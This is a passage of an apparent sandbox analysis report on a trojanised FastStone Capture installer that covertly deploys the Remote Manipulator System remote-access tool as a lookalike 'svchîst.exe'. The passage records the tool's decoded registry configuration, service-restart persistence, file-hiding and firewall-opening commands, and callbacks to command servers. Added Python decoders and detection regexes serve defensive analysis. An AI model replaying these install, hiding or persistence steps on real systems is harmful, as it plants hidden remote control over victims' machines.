6c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616
e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
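The REG_BINARY values written above are readable once decoded. The `General` value is a UTF-8 XML document with a byte-order mark (the RMS `general_settings` block), and `FailureActions` is the serialized SERVICE_FAILURE_ACTIONS structure that the Service Control Manager reads back for the `DNS-Service` service. The Python below is an added example, not part of the sandbox output: `GENERAL_HEX` is a contiguous excerpt of the `General` value recorded on this page, cut after `</sid_id>` to keep the block short, so the XML is intentionally truncated and is read with a tag regex rather than an XML parser; `FAILURE_ACTIONS_HEX` is the complete value from the `reg.exe` command line. Field meanings beyond the tag names (for example what `password_data` holds) are not established by this report.

```python
"""Decode the REG_BINARY values this sample writes with reg.exe.

Added example, not part of the sandbox report. GENERAL_HEX is a contiguous
excerpt of the "General" value recorded on this page (cut after </sid_id>);
FAILURE_ACTIONS_HEX is the complete FailureActions value.
"""
import re
import struct

GENERAL_HEX = (
    "efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a"
    "3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e"
    "3c706f72743e353635303c2f706f72743e"
    "3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e"
    "3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e"
    "3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e"
    "3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e"
    "3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e"
    "3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e"
    "3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e"
    "3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e"
    "3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e"
    "3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e"
    "3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e"
    "3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e"
    "3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e"
    "3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e"
    "3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e"
)

# Complete value from: REG ADD "...\Services\DNS-Service" /v FailureActions /t REG_BINARY /d ...
FAILURE_ACTIONS_HEX = (
    "0000000000000000000000000300000057005300"
    "010000000000000001000000000000000100000000000000"
)

# SC_ACTION.Type values from winsvc.h.
SC_ACTION_TYPES = {0: "SC_ACTION_NONE", 1: "SC_ACTION_RESTART",
                   2: "SC_ACTION_REBOOT", 3: "SC_ACTION_RUN_COMMAND"}

# Simple <tag>text</tag> pairs; attributes and nesting are not needed here.
TAG_RE = re.compile(r"<([A-Za-z0-9_]+)>([^<]*)</\1>")


def decode_general(hex_value: str) -> dict:
    """Return {tag: text} for every simple <tag>text</tag> pair in the value.

    The value is UTF-8 XML with a BOM. A tag regex is used instead of an XML
    parser so a truncated dump (as here) still yields the leading settings.
    """
    raw = bytes.fromhex(hex_value)
    if raw.startswith(b"\xef\xbb\xbf"):   # strip the UTF-8 byte-order mark
        raw = raw[3:]
    xml = raw.decode("utf-8")
    return {tag: text for tag, text in TAG_RE.findall(xml)}


def decode_failure_actions(hex_value: str) -> dict:
    """Parse the serialized SERVICE_FAILURE_ACTIONS stored in a service's FailureActions value.

    Layout (little-endian DWORDs): dwResetPeriod, lpRebootMsg, lpCommand,
    cActions, lpsaActions, then cActions x SC_ACTION {Type, Delay (ms)}.
    The two lp* fields are pointer placeholders and carry no meaning on disk.
    """
    raw = bytes.fromhex(hex_value)
    reset_period, _reboot_msg, _command, count, _actions_ptr = struct.unpack_from("<5I", raw, 0)
    actions = []
    for i in range(count):
        action_type, delay_ms = struct.unpack_from("<2I", raw, 20 + 8 * i)
        actions.append((SC_ACTION_TYPES.get(action_type, f"UNKNOWN({action_type})"), delay_ms))
    return {"reset_period_s": reset_period, "actions": actions}


if __name__ == "__main__":
    settings = decode_general(GENERAL_HEX)
    for key in ("port", "callback_auto_connect", "callback_connect_interval",
                "password_data", "sid_id"):
        print(f"{key:28s} {settings.get(key)!r}")
    print(decode_failure_actions(FAILURE_ACTIONS_HEX))
```

Port 5650 in the decoded settings is the same port the two netsh rules open, and `callback_auto_connect` with a 60-second `callback_connect_interval` is consistent with the repeated outbound connections on port 5655 listed under Network. `FailureActions` decodes to three SC_ACTION_RESTART entries with a 0 ms delay and no reset period, so the SCM restarts the service immediately every time it exits; that is the persistence the second `reg.exe` write buys.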

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d [REG_BINARY data elided] /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d [REG_BINARY data elided] /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d [REG_BINARY data elided] /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d 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 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1704287999-475954601-507434648-99498296618945160581881223229-178814020-1478364456"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

"C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\FastStone Capture"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-399961077-1035419136-51538432659625727512808450381434048045-557356600-1801917240"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\drivers\svchîst.exe

C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
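As a detection example (added here, not part of the sandbox output), the following Python turns the command lines in this process tree into process-creation indicators for the installer chain and evaluates them over a constructed event list. The regexes are derived only from the lines above: the `svch?st.exe` pattern requires a non-`o` character after `svch`, so the real svchost.exe never matches, and both the `/firewall` and `-firewall` spellings seen above are accepted. PIDs in the sample events are made up, and the long REG_BINARY payloads are shortened to `00`. Alerting on three or more distinct indicators per host is a starting threshold, not a tuned one.

```python
"""Process-creation indicators for the RMS silent-install chain seen in this report.

Added example, not part of the sandbox output. The regexes are derived from the
command lines recorded above; the event lists are constructed for the demo.
"""
import re

# (indicator name, pattern). Case-insensitive because cmd.exe, reg.exe and
# netsh.exe accept any casing. The "svch?st" patterns require a non-'o'
# character after "svch", so the genuine svchost.exe never matches.
INDICATORS = [
    ("svchost-lookalike executable",
     re.compile(r'svch[^o\s\\/"]st\.exe', re.I)),
    ("RMS service install switch on the lookalike",
     re.compile(r'svch[^o\s"]\S*st\.exe"?\s+[/-](?:silentinstall|firewall|start)\b', re.I)),
    ("firewall opened for TCP 5650",
     re.compile(r'netsh\s+(?:firewall\s+add\s+portopening\s+tcp\s+5650\b'
                r'|advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=5650\b)', re.I)),
    ("Remote Manipulator System key deleted",
     re.compile(r'reg\s+delete\s+"HKLM\\SYSTEM\\Remote Manipulator System"', re.I)),
    ("RMS processes killed",
     re.compile(r'taskkill\s+/f\s+/im\s+(?:rutserv|rfusclient)\.exe', re.I)),
    ("binary config stored under a file-extension class key",
     re.compile(r'reg\s+add\s+"HKLM\\SOFTWARE\\Classes\\\.\w+"\s+/v\s+\S+\s+/t\s+REG_BINARY', re.I)),
    ("service recovery/AppExit tampering",
     re.compile(r'\\Services\\\S+?(?:\\Parameters\\AppExit\b|"\s+/v\s+FailureActions\b)', re.I)),
    ("payload hidden with attrib +h +s",
     re.compile(r'attrib\s+\+h\s+\+s\s+"?(?:\S*svch|\S*\\System32\\\S+\.reg)', re.I)),
]

# (pid, command line). PIDs are constructed; command lines are the ones this
# report records, with REG_BINARY data shortened to "00".
SAMPLE_EVENTS = [
    (1001, r'"C:\Windows\System32\drivers\svchîst.exe" /silentinstall'),
    (1002, r'C:\Windows\SysWOW64\drivers\svchîst.exe -firewall'),
    (1003, r'netsh firewall add portopening TCP 5650 "Open Port 5650"'),
    (1004, r'netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650'),
    (1005, r'reg delete "HKLM\SYSTEM\Remote Manipulator System" /f'),
    (1006, r'taskkill /f /im rutserv.exe'),
    (1007, r'REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d 00 /f'),
    (1008, r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 00 /f'),
    (1009, r'attrib +h +s "svchîst.exe"'),
    (1010, r'attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"'),
]

# Constructed benign activity that should not fire.
BENIGN_EVENTS = [
    (2001, r'"C:\Windows\System32\svchost.exe" -k netsvcs -p'),
    (2002, r'netsh advfirewall firewall add rule name="IIS" dir=in action=allow protocol=TCP localport=443'),
    (2003, r'attrib +h +s "C:\Users\Admin\Desktop\notes.txt"'),
]


def classify(cmdline: str) -> list:
    """Names of every indicator that fires on one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def scan(events) -> dict:
    """Map indicator name -> PIDs whose command line triggered it."""
    hits = {}
    for pid, cmdline in events:
        for name in classify(cmdline):
            hits.setdefault(name, []).append(pid)
    return hits


def is_rms_install(events, min_indicators: int = 3) -> bool:
    """Alert when several distinct stages of the chain appear in one host's events."""
    return len(scan(events)) >= min_indicators


if __name__ == "__main__":
    for name, pids in scan(SAMPLE_EVENTS).items():
        print(f"{name:55s} pids={pids}")
    print("alert:", is_rms_install(SAMPLE_EVENTS), "benign:", is_rms_install(BENIGN_EVENTS))
```

Each indicator on its own is weak (an administrator may open a port or hide a file); the chain is what identifies this installer, which is why `is_rms_install` counts distinct indicators per host rather than firing on any single line.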

Network

Country Destination Domain Proto
US 8.8.8.8:53 smtp.spaceweb.ru udp
RU 77.222.41.136:25 smtp.spaceweb.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 109.234.156.179:5655 tcp

Files

memory/336-54-0x0000000075711000-0x0000000075713000-memory.dmp

memory/952-56-0x0000000000000000-mapping.dmp

memory/912-55-0x0000000000000000-mapping.dmp

memory/1788-58-0x0000000000000000-mapping.dmp

memory/1408-57-0x0000000000000000-mapping.dmp

memory/1148-59-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

memory/708-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

memory/1808-68-0x0000000000000000-mapping.dmp

memory/328-69-0x0000000000000000-mapping.dmp

memory/688-70-0x0000000000000000-mapping.dmp

memory/1536-72-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\nsExec.dll

MD5 f27689c513e7d12c7c974d5f8ef710d6
SHA1 e305f2a2898d765a64c82c449dfb528665b4a892
SHA256 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47
SHA512 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

memory/1476-75-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

memory/1000-79-0x0000000000000000-mapping.dmp

memory/1072-83-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

memory/640-85-0x0000000000000000-mapping.dmp

memory/884-86-0x0000000000000000-mapping.dmp

memory/1456-88-0x0000000000000000-mapping.dmp

memory/1688-87-0x0000000000000000-mapping.dmp

memory/112-89-0x0000000000000000-mapping.dmp

memory/1752-92-0x0000000000000000-mapping.dmp

memory/1272-93-0x0000000000000000-mapping.dmp

memory/1576-91-0x0000000000000000-mapping.dmp

memory/1528-90-0x0000000000000000-mapping.dmp

\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\nsProcess.dll

MD5 f0438a894f3a7e01a4aae8d1b5dd0289
SHA1 b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA256 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512 f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

memory/688-108-0x0000000000000000-mapping.dmp

memory/1332-109-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

memory/2040-114-0x0000000000000000-mapping.dmp

memory/588-118-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\FastStone Capture\FSCapture.ENU

MD5 a34680a3a79746aa2851f53ee970fed9
SHA1 88b31d3753012e3c8ed3806aa9fb45bb39091584
SHA256 9942d2e76602e3c3ffd2f2a6a124d2f768a361e46ba28f407604e77742ebc9dd
SHA512 cd0334613f0044aae24fb76812752e2e5c94a330d689230adedd2b625db4abedc57a8d216720b7c21784926df7e88cb891883671318f6001951946f418196ea7

memory/1536-112-0x0000000000000000-mapping.dmp

memory/664-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\FastStone\FSC\fsc.db

MD5 a979f58d3ece3f44d6572a44efb4a0cc
SHA1 2ac4dbb1994f4b3ef9c13445734f9c16843b140b
SHA256 9ebc76ead646faf16af6605a7d7a8a5c5a3ccf9b9e2ca6628381a5da2b26a87e
SHA512 9bbe07357c6ec4e7eb66acb4b068e1dccd4d73b7fd88d07a4c664ea4501bf3e581bdfe3a221a187ef242570a8733eef5b5227c14f365b1fd79a4f40a17c1c471

memory/1576-121-0x0000000000000000-mapping.dmp

memory/976-122-0x0000000000000000-mapping.dmp

memory/1784-124-0x0000000000000000-mapping.dmp

memory/1484-123-0x0000000000000000-mapping.dmp

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/1156-127-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

memory/1388-135-0x0000000000000000-mapping.dmp

memory/972-141-0x0000000000000000-mapping.dmp

memory/1940-150-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\idfgvgjnghcdfb.reg

MD5 7b5e1d30e89e0ef1c86fecb977131673
SHA1 78df83f3256df2efbe483d182d4cc13afe99be2b
SHA256 b114302cfede0f574362385c4949dde34c544b5213a239908299588f00b0bd80
SHA512 eae8f24f30b8dac2d0944fb702aca9c6ca30a5d3ffb6a4191afec47af1f59a50bbaa00d11b07976f485c58839f1927695655a69ff81807ca123026dd2e84b719

memory/1120-152-0x0000000000000000-mapping.dmp

memory/944-153-0x0000000000000000-mapping.dmp

memory/328-154-0x0000000000000000-mapping.dmp

memory/1664-155-0x0000000000000000-mapping.dmp
